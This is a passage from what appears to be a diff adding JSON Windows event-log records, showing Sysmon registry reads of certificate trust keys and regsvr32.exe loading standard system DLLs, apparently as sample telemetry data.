"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "regsvr32.exe", + "image_path": "C:\\Windows\\System32\\regsvr32.exe", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235580000, + "unique_pid": 
"{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "apphelp.dll", + "image_path": "C:\\Windows\\System32\\apphelp.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 3596, + "process_name": 
"regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 3596, + 
"process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\System32\\propsys.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": 
"C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": 
"CTLs", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573235890000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "AcLayers.dll", + "image_path": "C:\\Windows\\System32\\AcLayers.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "uxtheme.dll", + "image_path": "C:\\Windows\\System32\\uxtheme.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": 